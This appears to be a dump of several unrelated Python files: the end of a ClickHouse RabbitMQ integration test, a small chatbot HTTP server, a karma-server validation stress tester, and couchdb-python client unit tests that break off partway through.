result = instance.query('SELECT count() FROM test.rabbitmq_settings', ignore_error=True)
while int(result) != 10:
time.sleep(0.5)
result = instance.query('SELECT count() FROM test.view', ignore_error=True)
instance.query('DROP TABLE test.rabbitmq_settings')
# queue size is 10, but 50 messages were sent, they will be dropped (setting x-overflow = reject-publish) and only 10 will remain.
assert(int(result) == 10)
def test_rabbitmq_queue_consume(rabbitmq_cluster):
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.queue_declare(queue='rabbit_queue', durable=True)
i = [0]
messages_num = 1000
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
message = json.dumps({'key': i[0], 'value': i[0]})
channel.basic_publish(exchange='', routing_key='rabbit_queue', body=message)
i[0] += 1
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
instance.query('''
CREATE TABLE test.rabbitmq_queue (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_format = 'JSONEachRow',
rabbitmq_queue_base = 'rabbit_queue',
rabbitmq_queue_consume = 1;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq_queue;
''')
result = ''
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == messages_num * threads_num:
break
time.sleep(1)
for thread in threads:
thread.join()
instance.query('DROP TABLE test.rabbitmq_queue')
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
chatServer.py
|
import os
import sys
import time
import queue
import train
import requests
import datetime
import threading
import jieba
import http.server
from os import path
from hparams import Hparams
from cgi import parse_header
from urllib.parse import parse_qs
from chat_settings import ChatSettings
from chat import ChatSession
waiting_queue = queue.Queue()
chat_setting = None
result_queue = dict()
class Struct():
def __init__(self, id, data):
self.id = id
self.data = data
ids = set()
class ServerClass(http.server.CGIHTTPRequestHandler):
def __init__(self, request, client_address, server):
super().__init__(request, client_address, server)
def do_POST(self):
ctype, pdict = parse_header(self.headers['content-type'])
if ctype == 'application/x-www-form-urlencoded':
length = int(self.headers['content-length'])
postvars = parse_qs(self.rfile.read(length).decode(), keep_blank_values=1)
question = ' '.join(jieba.cut(postvars['question'][0]))
print('chat :{} {}'.format(postvars['id'], question))
if postvars['id'][0] in ids:
print('ignore')
self.send_response(200)
self.end_headers()
self.wfile.write(b'success')
return
ids.add(postvars['id'][0])
waiting_queue.put(Struct(postvars['id'][0], question))
start_time = time.time()
while time.time() - start_time < 10 and result_queue.get(postvars['id'][0], None) is None:
pass
response = result_queue.pop(postvars['id'][0], 'server timeout :(')
self.send_response(200)
self.end_headers()
self.wfile.write(response.encode())
ids.remove(postvars['id'][0])
else:
self.send_response(200)
self.end_headers()
self.wfile.write('wrong')
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write('ok'.encode())
class ChatServer(object):
def __init__(self, training):
if training:
checkpointfile = r'models\best_weights_training.ckpt'
# Make sure checkpoint file & hparams file exists
checkpoint_filepath = os.path.relpath(checkpointfile)
model_dir = os.path.dirname(checkpoint_filepath)
hparams = Hparams()
global chat_setting
# Setting up the chat
self.chatlog_filepath = path.join(model_dir, "chat_logs", "chatlog_{0}.txt".format(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")))
chat_setting = self.chat_settings = ChatSettings(hparams.inference_hparams)
# chat_command_handler.print_commands()
self.train_thred = threading.Thread(target=train.train, args=(waiting_queue, chat_setting, result_queue))
self.train_thred.start()
else:
def server_thread_function():
sess = ChatSession()
while True:
if not waiting_queue.empty():
q = waiting_queue.get()
if q.data == 'version':
t = os.path.getmtime('models/best_weights_training.ckpt.data-00000-of-00001')
result_queue[q.id] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(t))
else:
result_queue[q.id] = sess.chat(q.data)
print(result_queue[q.id])
threading.Thread(target=server_thread_function).start()
try:
myip = requests.get('http://fun.alphamj.cn/wx/registered').content.decode()
except:
myip = '127.0.0.1'
print('listen {}:4321'.format(myip))
self.server = http.server.HTTPServer((myip, 4321), ServerClass)
print('server init finish')
if __name__ == '__main__':
jieba.initialize()
s = ChatServer(len(sys.argv) > 1 and sys.argv[1] == 'train')
s.server.serve_forever()
|
validation_tester.py
|
''' Tester module for testing Validation Provider '''
import threading
import time
from math import floor
from random import random, randint
import requests
import karmaserver.utils as utils
from karmaserver.constants import ENDPOINT, MINIMUM_VOTES, VOTES_TO_DISPUTED
from karmaserver.tests.test import TestAbstract
from karmaserver.data.models.observation import State
class CreateRandomObservationTest(TestAbstract):
''' Creates one Observation '''
def __init__(self):
self.dictionary = _generate_observation()
self.error_message = ''
def run(self):
status, response, _ = _call_server(self.dictionary)
if not status:
self.error_message = response
return status
def get_result(self):
if self.error_message:
return self.error_message
return ''
class StressValidationTest(TestAbstract):
''' Does 50 random validations '''
def __init__(self):
self.result = []
self.error_message = None
def run(self):
threads = self.__get_thread_list()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return self.error_message is None
def __get_thread_list(self):
threads = []
for _ in range(10):
thread = threading.Thread(target=self.__run, args=(2,))
threads.append(thread)
return threads
def get_result(self):
if self.error_message:
return self.error_message
elapsed = floor(sum(self.result)/len(self.result))
return f'(Average request time {elapsed} ns)'
def __run(self, number_of_requests):
cont = 1
while cont < number_of_requests:
dictionary = _generate_observation()
status, response, time_ = _call_server(dictionary)
if not status:
self.error_message = response
return
self.result.append(time_)
cont = cont + 1
if cont != number_of_requests:
self.error_message = 'Exception in server'
class ApproveObservationTest(TestAbstract):
''' Does 50 random validations '''
def __init__(self):
self.result = []
self.obs_id = utils.generate_test_name()
self.error_message = None
def run(self):
threads = self.__get_thread_list()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
observation = _generate_observation(obs_id=self.obs_id, vote_type=True)
status, response, _ = _call_server(observation)
code = response['code']
status = response['payload']['state']
return self.error_message is None and code == 200 and status == State.APPROVED.value
def __get_thread_list(self):
threads = []
number_of_requests = 2
number_of_threads = (MINIMUM_VOTES + 5) / number_of_requests
for _ in range(floor(number_of_threads)):
thread = threading.Thread(target=self.__run, args=(number_of_requests,))
threads.append(thread)
return threads
def get_result(self):
if self.error_message:
return self.error_message
elapsed = floor(sum(self.result)/len(self.result))
return f'(Average request time {elapsed} ns)'
def __run(self, number_of_requests):
cont = 1
while cont < number_of_requests:
dictionary = _generate_observation(obs_id=self.obs_id, vote_type=True)
status, response, time_ = _call_server(dictionary)
if not status:
self.error_message = response
return
self.result.append(time_)
cont = cont + 1
if cont != number_of_requests:
self.error_message = 'Exception in server'
class DenyObservationTest(TestAbstract):
''' Does 50 random validations '''
def __init__(self):
self.result = []
self.obs_id = utils.generate_test_name()
self.error_message = None
def run(self):
threads = self.__get_thread_list()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
observation = _generate_observation(obs_id=self.obs_id, vote_type=False)
status, response, _ = _call_server(observation)
code = response['code']
status = response['payload']['state']
return self.error_message is None and code == 200 and status == State.DENYED.value
def __get_thread_list(self):
threads = []
number_of_requests = 2
number_of_threads = (MINIMUM_VOTES + 5) / number_of_requests
for _ in range(floor(number_of_threads)):
thread = threading.Thread(target=self.__run, args=(number_of_requests,))
threads.append(thread)
return threads
def get_result(self):
if self.error_message:
return self.error_message
elapsed = floor(sum(self.result)/len(self.result))
return f'(Average request time {elapsed} ns)'
def __run(self, number_of_requests):
cont = 1
while cont < number_of_requests:
dictionary = _generate_observation(obs_id=self.obs_id, vote_type=False)
status, response, time_ = _call_server(dictionary)
if not status:
self.error_message = response
return
self.result.append(time_)
cont = cont + 1
if cont != number_of_requests:
self.error_message = 'Exception in server'
class DisputeObservationTest(TestAbstract):
''' Does 50 random validations '''
def __init__(self):
self.result = []
self.obs_id = utils.generate_test_name()
self.error_message = None
def run(self):
threads = self.__get_thread_list()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
observation = _generate_observation(obs_id=self.obs_id, karma_level=1)
status, response, _ = _call_server(observation)
code = response['code']
status = response['payload']['state']
return self.error_message is None and code == 200 and status == State.DISPUTED.value
def __get_thread_list(self):
threads = []
number_of_requests = (VOTES_TO_DISPUTED)
for _ in range(2):
thread = threading.Thread(target=self.__run, args=(number_of_requests,))
threads.append(thread)
return threads
def get_result(self):
if self.error_message:
return self.error_message
elapsed = floor(sum(self.result)/len(self.result))
return f'(Average request time {elapsed} ns)'
def __run(self, number_of_requests):
cont = 1
while cont < number_of_requests:
vote_type = (cont % 2) == 0
dictionary = _generate_observation(obs_id=self.obs_id, vote_type=vote_type, karma_level=1)
status, response, time_ = _call_server(dictionary)
if not status:
self.error_message = response
return
self.result.append(time_)
cont = cont + 1
if cont != number_of_requests:
self.error_message = 'Exception in server'
class DoubleUserObservationTest(TestAbstract):
''' Sends to repeated votation, must receive a Bad Request (400) in the second one '''
def __init__(self):
self.dictionary = _generate_observation()
self.error_message = ''
def run(self):
_call_server(self.dictionary)
status, response, _ = _call_server(self.dictionary)
if not status:
self.error_message = response
return status and response['code'] == 400
def get_result(self):
if self.error_message:
return self.error_message
return ''
class MultipleVotesInSameObservationTest(TestAbstract):
''' Sends multiple votations to the same observation but different users '''
def __init__(self):
self.error_message = ''
self.observation_id = f'test-{time.time()}'
def run(self):
for item in range(10):
observation = _generate_observation(user_id=f'{self.observation_id}{item}',
obs_id=self.observation_id)
status, response, _ = _call_server(observation)
if not status:
self.error_message = response
return
return status
def get_result(self):
if self.error_message:
return self.error_message
return ''
class NoObservationTest(TestAbstract):
''' Sends to repeated votation, must receive a Bad Request (400) in the second one '''
def __init__(self):
self.dictionary = _generate_observation()
self.error_message = ''
def run(self):
status, response, _ = _call_server(None)
if not status:
self.error_message = response
return status and response['code'] == 400
def get_result(self):
if self.error_message:
return self.error_message
return ''
def _call_server(dictionary):
try:
response = requests.post(f'{ENDPOINT}/validation/vote',
json=dictionary)
time_ = float(response.headers['Request-Time'].replace(" ns", ""))
return True, response.json(), time_
except requests.exceptions.ConnectionError:
return False, 'Could not connect to the server', None
def _generate_observation(user_id=None, karma_level=None, vote_type=None, obs_id=None):
if user_id is None:
user_id = randint(1, 1000)
if vote_type is None:
vote_type = random() < 0.75
if karma_level is None:
karma_level = randint(1, 1000)
if obs_id is None:
obs_id = randint(1, 1000)
dictionary = {
"user_info": {
"_id": user_id
},
"vote_info": {
"karma_level": karma_level,
"vote_type": vote_type
},
"observation_info": {
"_id": obs_id,
"brightness": floor(random() * 20 + 5),
"image": {
"_id": obs_id,
"fwhm": floor(random() * 10 - 5),
"probability": floor(random() * 100),
"x_size": 100,
"y_size": 100
},
"votes": {
"upvotes":0,
"downvotes":0
},
"position": {
"x": 12,
"y": 15
}
}
}
return dictionary
|
client.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2009 Christopher Lenz
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
from datetime import datetime
import doctest
import os
import os.path
import shutil
from StringIO import StringIO
import time
import tempfile
import threading
import unittest
import urlparse
from couchdb import client, http
from couchdb.tests import testutil
class ServerTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_init_with_resource(self):
sess = http.Session()
res = http.Resource(client.DEFAULT_BASE_URL, sess)
serv = client.Server(url=res)
serv.config()
def test_init_with_session(self):
sess = http.Session()
serv = client.Server(client.DEFAULT_BASE_URL, session=sess)
serv.config()
self.assertTrue(serv.resource.session is sess)
def test_exists(self):
self.assertTrue(client.Server(client.DEFAULT_BASE_URL))
self.assertFalse(client.Server('http://localhost:9999'))
def test_repr(self):
repr(self.server)
def test_server_vars(self):
version = self.server.version()
self.assertTrue(isinstance(version, basestring))
config = self.server.config()
self.assertTrue(isinstance(config, dict))
tasks = self.server.tasks()
self.assertTrue(isinstance(tasks, list))
def test_server_stats(self):
stats = self.server.stats()
self.assertTrue(isinstance(stats, dict))
stats = self.server.stats('httpd/requests')
self.assertTrue(isinstance(stats, dict))
self.assertTrue(len(stats) == 1 and len(stats['httpd']) == 1)
def test_get_db_missing(self):
self.assertRaises(http.ResourceNotFound,
lambda: self.server['couchdb-python/missing'])
def test_create_db_conflict(self):
name, db = self.temp_db()
self.assertRaises(http.PreconditionFailed, self.server.create,
name)
def test_delete_db(self):
name, db = self.temp_db()
assert name in self.server
self.del_db(name)
assert name not in self.server
def test_delete_db_missing(self):
self.assertRaises(http.ResourceNotFound, self.server.delete,
'couchdb-python/missing')
def test_replicate(self):
aname, a = self.temp_db()
bname, b = self.temp_db()
id, rev = a.save({'test': 'a'})
result = self.server.replicate(aname, bname)
self.assertEquals(result['ok'], True)
self.assertEquals(b[id]['test'], 'a')
doc = b[id]
doc['test'] = 'b'
b.update([doc])
self.server.replicate(bname, aname)
self.assertEquals(a[id]['test'], 'b')
self.assertEquals(b[id]['test'], 'b')
def test_replicate_continuous(self):
aname, a = self.temp_db()
bname, b = self.temp_db()
result = self.server.replicate(aname, bname, continuous=True)
self.assertEquals(result['ok'], True)
version = tuple(int(i) for i in self.server.version().split('.')[:2])
if version >= (0, 10):
self.assertTrue('_local_id' in result)
def test_iter(self):
aname, a = self.temp_db()
bname, b = self.temp_db()
dbs = list(self.server)
self.assertTrue(aname in dbs)
self.assertTrue(bname in dbs)
def test_len(self):
self.temp_db()
self.temp_db()
self.assertTrue(len(self.server) >= 2)
def test_uuids(self):
ls = self.server.uuids()
assert type(ls) == list
ls = self.server.uuids(count=10)
assert type(ls) == list and len(ls) == 10
class DatabaseTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_save_new(self):
doc = {'foo': 'bar'}
id, rev = self.db.save(doc)
self.assertTrue(id is not None)
self.assertTrue(rev is not None)
self.assertEqual((id, rev), (doc['_id'], doc['_rev']))
doc = self.db.get(id)
self.assertEqual(doc['foo'], 'bar')
def test_save_new_with_id(self):
doc = {'_id': 'foo'}
id, rev = self.db.save(doc)
self.assertTrue(doc['_id'] == id == 'foo')
self.assertEqual(doc['_rev'], rev)
def test_save_existing(self):
doc = {}
id_rev_old = self.db.save(doc)
doc['foo'] = True
id_rev_new = self.db.save(doc)
self.assertTrue(doc['_rev'] == id_rev_new[1])
self.assertTrue(id_rev_old[1] != id_rev_new[1])
def test_save_new_batch(self):
doc = {'_id': 'foo'}
id, rev = self.db.save(doc, batch='ok')
self.assertTrue(rev is None)
self.assertTrue('_rev' not in doc)
def test_save_existing_batch(self):
doc = {'_id': 'foo'}
self.db.save(doc)
id_rev_old = self.db.save(doc)
id_rev_new = self.db.save(doc, batch='ok')
self.assertTrue(id_rev_new[1] is None)
self.assertEqual(id_rev_old[1], doc['_rev'])
def test_exists(self):
self.assertTrue(self.db)
self.assertFalse(client.Database('couchdb-python/missing'))
def test_name(self):
# Access name assigned during creation.
name, db = self.temp_db()
self.assertTrue(db.name == name)
# Access lazily loaded name,
self.assertTrue(client.Database(db.resource.url).name == name)
def test_commit(self):
self.assertTrue(self.db.commit()['ok'] == True)
def test_create_large_doc(self):
self.db['foo'] = {'data': '0123456789' * 110 * 1024} # 10 MB
self.assertEqual('foo', self.db['foo']['_id'])
def test_doc_id_quoting(self):
self.db['foo/bar'] = {'foo': 'bar'}
self.assertEqual('bar', self.db['foo/bar']['foo'])
del self.db['foo/bar']
self.assertEqual(None, self.db.get('foo/bar'))
def test_unicode(self):
self.db[u'føø'] = {u'bår': u'Iñtërnâtiônàlizætiøn', 'baz': 'ASCII'}
self.assertEqual(u'Iñtërnâtiônàlizætiøn', self.db[u'føø'][u'bår'])
self.assertEqual(u'ASCII', self.db[u'føø'][u'baz'])
def test_disallow_nan(self):
try:
self.db['foo'] = {'number': float('nan')}
self.fail('Expected ValueError')
except ValueError:
pass
def test_disallow_none_id(self):
deldoc = lambda: self.db.delete({'_id': None, '_rev': None})
self.assertRaises(ValueError, deldoc)
def test_doc_revs(self):
doc = {'bar': 42}
self.db['foo'] = doc
old_rev = doc['_rev']
doc['bar'] = 43
self.db['foo'] = doc
new_rev = doc['_rev']
new_doc = self.db.get('foo')
self.assertEqual(new_rev, new_doc['_rev'])
new_doc = self.db.get('foo', rev=new_rev)
self.assertEqual(new_rev, new_doc['_rev'])
old_doc = self.db.get('foo', rev=old_rev)
self.assertEqual(old_rev, old_doc['_rev'])
revs = [i for i in self.db.revisions('foo')]
self.assertEqual(revs[0]['_rev'], new_rev)
self.assertEqual(revs[1]['_rev'], old_rev)
gen = self.db.revisions('crap')
self.assertRaises(StopIteration, lambda: gen.next())
self.assertTrue(self.db.compact())
while self.db.info()['compact_running']:
pass
# 0.10 responds with 404, 0.9 responds with 500, same content
doc = 'fail'
try:
doc = self.db.get('foo', rev=old_rev)
except http.ServerError:
doc = None
assert doc is None
def test_attachment_crud(self):
doc = {'bar': 42}
self.db['foo'] = doc
old_rev = doc['_rev']
self.db.put_attachment(doc, 'Foo bar', 'foo.txt', 'text/plain')
self.assertNotEquals(old_rev, doc['_rev'])
doc = self.db['foo']
attachment = doc['_attachments']['foo.txt']
self.assertEqual(len('Foo bar'), attachment['length'])
self.assertEqual('text/plain', attachment['content_type'])
self.assertEqual('Foo bar',
self.db.get_attachment(doc, 'foo.txt').read())
self.assertEqual('Foo bar',
self.db.get_attachment('foo', 'foo.txt').read())
old_rev = doc['_rev']
self.db.delete_attachment(doc, 'foo.txt')
self.assertNotEquals(old_rev, doc['_rev'])
self.assertEqual(None, self.db['foo'].get('_attachments'))
def test_attachment_crud_with_files(self):
doc = {'bar': 42}
self.db['foo'] = doc
old_rev = doc['_rev']
fileobj = StringIO('Foo bar baz')
self.db.put_attachment(doc, fileobj, 'foo.txt')
self.assertNotEquals(old_rev, doc['_rev'])
doc = self.db['foo']
attachment = doc['_attachments']['foo.txt']
self.assertEqual(len('Foo bar baz'), attachment['length'])
self.assertEqual('text/plain', attachment['content_type'])
self.assertEqual('Foo bar baz',
self.db.get_attachment(doc, 'foo.txt').read())
self.assertEqual('Foo bar baz',
self.db.get_attachment('foo', 'foo.txt').read())
old_rev = doc['_rev']
self.db.delete_attachment(doc, 'foo.txt')
self.assertNotEquals(old_rev, doc['_rev'])
self.assertEqual(None, self.db['foo'].get('_attachments'))
def test_empty_attachment(self):
doc = {}
self.db['foo'] = doc
old_rev = doc['_rev']
self.db.put_attachment(doc, '', 'empty.txt')
self.assertNotEquals(old_rev, doc['_rev'])
doc = self.db['foo']
attachment = doc['_attachments']['empty.txt']
self.assertEqual(0, attachment['length'])
def test_default_attachment(self):
doc = {}
self.db['foo'] = doc
self.assertTrue(self.db.get_attachment(doc, 'missing.txt') is None)
sentinel = object()
self.assertTrue(self.db.get_attachment(doc, 'missing.txt', sentinel) is sentinel)
def test_attachment_from_fs(self):
tmpdir = tempfile.mkdtemp()
tmpfile = os.path.join(tmpdir, 'test.txt')
f = open(tmpfile, 'w')
f.write('Hello!')
f.close()
doc = {}
self.db['foo'] = doc
self.db.put_attachment(doc, open(tmpfile))
doc = self.db.get('foo')
self.assertTrue(doc['_attachments']['test.txt']['content_type'] == 'text/plain')
shutil.rmtree(tmpdir)
def test_attachment_no_filename(self):
doc = {}
self.db['foo'] = doc
self.assertRaises(ValueError, self.db.put_attachment, doc, '')
def test_json_attachment(self):
doc = {}
self.db['foo'] = doc
self.db.put_attachment(doc, '{}', 'test.json', 'application/json')
self.assertEquals(self.db.get_attachment(doc, 'test.json').read(), '{}')
def test_include_docs(self):
doc = {'foo': 42, 'bar': 40}
self.db['foo'] = doc
rows = list(self.db.query(
'function(doc) { emit(doc._id, null); }',
include_docs=True
))
self.assertEqual(1, len(rows))
self.assertEqual(doc, rows[0].doc)
def test_query_multi_get(self):
for i in range(1, 6):
self.db.save({'i': i})
res = list(self.db.query('function(doc) { emit(doc.i, null); }',
keys=range(1, 6, 2)))
self.assertEqual(3, len(res))
for idx, i in enumerate(range(1, 6, 2)):
self.assertEqual(i, res[idx].key)
def test_bulk_update_conflict(self):
docs = [
dict(type='Person', name='John Doe'),
dict(type='Person', name='Mary Jane'),
dict(type='City', name='Gotham City')
]
self.db.update(docs)
# update the first doc to provoke a conflict in the next bulk update
doc = docs[0].copy()
self.db[doc['_id']] = doc
results = self.db.update(docs)
self.assertEqual(False, results[0][0])
assert isinstance(results[0][2], http.ResourceConflict)
def test_bulk_update_all_or_nothing(self):
docs = [
dict(type='Person', name='John Doe'),
dict(type='Person', name='Mary Jane'),
dict(type='City', name='Gotham City')
]
self.db.update(docs)
# update the first doc to provoke a conflict in the next bulk update
doc = docs[0].copy()
doc['name'] = 'Jane Doe'
self.db[doc['_id']] = doc
results = self.db.update(docs, all_or_nothing=True)
self.assertEqual(True, results[0][0])
doc = self.db.get(doc['_id'], conflicts=True)
assert '_conflicts' in doc
revs = self.db.get(doc['_id'], open_revs='all')
assert len(revs) == 2
def test_bulk_update_bad_doc(self):
self.assertRaises(TypeError, self.db.update, [object()])
def test_copy_doc(self):
self.db['foo'] = {'status': 'testing'}
result = self.db.copy('foo', 'bar')
self.assertEqual(result, self.db['bar'].rev)
def test_copy_doc_conflict(self):
self.db['bar'] = {'status': 'idle'}
self.db['foo'] = {'status': 'testing'}
self.assertRaises(http.ResourceConflict, self.db.copy, 'foo', 'bar')
def test_copy_doc_overwrite(self):
self.db['bar'] = {'status': 'idle'}
self.db['foo'] = {'status': 'testing'}
result = self.db.copy('foo', self.db['bar'])
doc = self.db['bar']
self.assertEqual(result, doc.rev)
self.assertEqual('testing', doc['status'])
def test_copy_doc_srcobj(self):
self.db['foo'] = {'status': 'testing'}
self.db.copy(self.db['foo'], 'bar')
self.assertEqual('testing', self.db['bar']['status'])
def test_copy_doc_destobj_norev(self):
self.db['foo'] = {'status': 'testing'}
self.db.copy('foo', {'_id': 'bar'})
self.assertEqual('testing', self.db['bar']['status'])
def test_copy_doc_src_dictlike(self):
class DictLike(object):
def __init__(self, doc):
self.doc = doc
def items(self):
return self.doc.items()
self.db['foo'] = {'status': 'testing'}
self.db.copy(DictLike(self.db['foo']), 'bar')
self.assertEqual('testing', self.db['bar']['status'])
def test_copy_doc_dest_dictlike(self):
class DictLike(object):
def __init__(self, doc):
self.doc = doc
def items(self):
return self.doc.items()
self.db['foo'] = {'status': 'testing'}
self.db['bar'] = {}
self.db.copy('foo', DictLike(self.db['bar']))
self.assertEqual('testing', self.db['bar']['status'])
def test_copy_doc_src_baddoc(self):
self.assertRaises(TypeError, self.db.copy, object(), 'bar')
def test_copy_doc_dest_baddoc(self):
self.assertRaises(TypeError, self.db.copy, 'foo', object())
def test_changes(self):
self.db['foo'] = {'bar': True}
self.assertEqual(self.db.changes(since=0)['last_seq'], 1)
first = self.db.changes(feed='continuous').next()
self.assertEqual(first['seq'], 1)
self.assertEqual(first['id'], 'foo')
def test_changes_releases_conn(self):
# Consume an entire changes feed to read the whole response, then check
# that the HTTP connection made it to the pool.
list(self.db.changes(feed='continuous', timeout=0))
scheme, netloc = urlparse.urlsplit(client.DEFAULT_BASE_URL)[:2]
self.assertTrue(self.db.resource.session.connection_pool.conns[(scheme, netloc)])
def test_changes_releases_conn_when_lastseq(self):
# Consume a changes feed, stopping at the 'last_seq' item, i.e. don't
# let the generator run any further, then check the connection made it
# to the pool.
for obj in self.db.changes(feed='continuous', timeout=0):
if 'last_seq' in obj:
break
scheme, netloc = urlparse.urlsplit(client.DEFAULT_BASE_URL)[:2]
self.assertTrue(self.db.resource.session.connection_pool.conns[(scheme, netloc)])
def test_changes_conn_usable(self):
# Consume a changes feed to get a used connection in the pool.
list(self.db.changes(feed='continuous', timeout=0))
# Try using the connection again to make sure the connection was left
# in a good state from the previous request.
self.assertTrue(self.db.info()['doc_count'] == 0)
def test_changes_heartbeat(self):
def wakeup():
time.sleep(.3)
self.db.save({})
threading.Thread(target=wakeup).start()
for change in self.db.changes(feed='continuous', heartbeat=100):
break
def test_purge(self):
doc = {'a': 'b'}
self.db['foo'] = doc
self.assertEqual(self.db.purge([doc])['purge_seq'], 1)
def test_json_encoding_error(self):
doc = {'now': datetime.now()}
self.assertRaises(TypeError, self.db.save, doc)
class ViewTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_row_object(self):
row = list(self.db.view('_all_docs', keys=['blah']))[0]
self.assertEqual(repr(row), "<Row key='blah', error='not_found'>")
self.assertEqual(row.id, None)
self.assertEqual(row.key, 'blah')
self.assertEqual(row.value, None)
self.assertEqual(row.error, 'not_found')
self.db.save({'_id': 'xyz', 'foo': 'bar'})
row = list(self.db.view('_all_docs', keys=['xyz']))[0]
self.assertEqual(row.id, 'xyz')
self.assertEqual(row.key, 'xyz')
self.assertEqual(row.value.keys(), ['rev'])
self.assertEqual(row.error, None)
def test_view_multi_get(self):
for i in range(1, 6):
self.db.save({'i': i})
self.db['_design/test'] = {
'language': 'javascript',
'views': {
'multi_key': {'map': 'function(doc) { emit(doc.i, null); }'}
}
}
res = list(self.db.view('test/multi_key', keys=range(1, 6, 2)))
self.assertEqual(3, len(res))
for idx, i in enumerate(range(1, 6, 2)):
self.assertEqual(i, res[idx].key)
def test_ddoc_info(self):
self.db['_design/test'] = {
'language': 'javascript',
'views': {
'test': {'map': 'function(doc) { emit(doc.type, null); }'}
}
}
info = self.db.info('test')
self.assertEqual(info['view_index']['compact_running'], False)
def test_view_compaction(self):
for i in range(1, 6):
self.db.save({'i': i})
self.db['_design/test'] = {
'language': 'javascript',
'views': {
'multi_key': {'map': 'function(doc) { emit(doc.i, null); }'}
}
}
self.db.view('test/multi_key')
self.assertTrue(self.db.compact('test'))
def test_view_cleanup(self):
for i in range(1, 6):
self.db.save({'i': i})
self.db['_design/test'] = {
'language': 'javascript',
'views': {
'multi_key': {'map': 'function(doc) { emit(doc.i, null); }'}
}
}
self.db.view('test/multi_key')
ddoc = self.db['_design/test']
ddoc['views'] = {
'ids': {'map': 'function(doc) { emit(doc._id, null); }'}
}
self.db.update([ddoc])
self.db.view('test/ids')
self.assertTrue(self.db.cleanup())
def test_view_function_objects(self):
if 'python' not in self.server.config()['query_servers']:
return
for i in range(1, 4):
self.db.save({'i': i, 'j':2*i})
def map_fun(doc):
yield doc['i'], doc['j']
res = list(self.db.query(map_fun, language='python'))
self.assertEqual(3, len(res))
for idx, i in enumerate(range(1,4)):
self.assertEqual(i, res[idx].key)
self.assertEqual(2*i, res[idx].value)
def reduce_fun(keys, values):
return sum(values)
res = list(self.db.query(map_fun, reduce_fun, 'python'))
self.assertEqual(1, len(res))
self.assertEqual(12, res[0].value)
def test_init_with_resource(self):
self.db['foo'] = {}
view = client.PermanentView(self.db.resource('_all_docs').url, '_all_docs')
self.assertEquals(len(list(view())), 1)
def test_iter_view(self):
self.db['foo'] = {}
view = client.PermanentView(self.db.resource('_all_docs').url, '_all_docs')
self.assertEquals(len(list(view)), 1)
def test_tmpview_repr(self):
mapfunc = "function(doc) {emit(null, null);}"
view = client.TemporaryView(self.db.resource('_temp_view'), mapfunc)
self.assertTrue('TemporaryView' in repr(view))
self.assertTrue(mapfunc in repr(view))
def test_wrapper_iter(self):
class Wrapper(object):
def __init__(self, doc):
pass
self.db['foo'] = {}
self.assertTrue(isinstance(list(self.db.view('_all_docs', wrapper=Wrapper))[0], Wrapper))
def test_wrapper_rows(self):
class Wrapper(object):
def __init__(self, doc):
pass
self.db['foo'] = {}
self.assertTrue(isinstance(self.db.view('_all_docs', wrapper=Wrapper).rows[0], Wrapper))
def test_properties(self):
for attr in ['rows', 'total_rows', 'offset']:
self.assertTrue(getattr(self.db.view('_all_docs'), attr) is not None)
def test_rowrepr(self):
self.db['foo'] = {}
rows = list(self.db.query("function(doc) {emit(null, 1);}"))
self.assertTrue('Row' in repr(rows[0]))
self.assertTrue('id' in repr(rows[0]))
rows = list(self.db.query("function(doc) {emit(null, 1);}", "function(keys, values, combine) {return sum(values);}"))
self.assertTrue('Row' in repr(rows[0]))
self.assertTrue('id' not in repr(rows[0]))
class ShowListTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
show_func = """
function(doc, req) {
return {"body": req.id + ":" + (req.query.r || "<default>")};
}
"""
list_func = """
function(head, req) {
start({headers: {'Content-Type': 'text/csv'}});
if (req.query.include_header) {
send('id' + '\\r\\n');
}
var row;
while (row = getRow()) {
send(row.id + '\\r\\n');
}
}
"""
design_doc = {'_id': '_design/foo',
'shows': {'bar': show_func},
'views': {'by_id': {'map': "function(doc) {emit(doc._id, null)}"},
'by_name': {'map': "function(doc) {emit(doc.name, null)}"}},
'lists': {'list': list_func}}
def setUp(self):
super(ShowListTestCase, self).setUp()
# Workaround for possible bug in CouchDB. Adding a timestamp avoids a
# 409 Conflict error when pushing the same design doc that existed in a
# now deleted database.
design_doc = dict(self.design_doc)
design_doc['timestamp'] = time.time()
self.db.save(design_doc)
self.db.update([{'_id': '1', 'name': 'one'}, {'_id': '2', 'name': 'two'}])
def test_show_urls(self):
self.assertEqual(self.db.show('_design/foo/_show/bar')[1].read(), 'null:<default>')
self.assertEqual(self.db.show('foo/bar')[1].read(), 'null:<default>')
def test_show_docid(self):
self.assertEqual(self.db.show('foo/bar')[1].read(), 'null:<default>')
self.assertEqual(self.db.show('foo/bar', '1')[1].read(), '1:<default>')
self.assertEqual(self.db.show('foo/bar', '2')[1].read(), '2:<default>')
def test_show_params(self):
self.assertEqual(self.db.show('foo/bar', r='abc')[1].read(), 'null:abc')
def test_list(self):
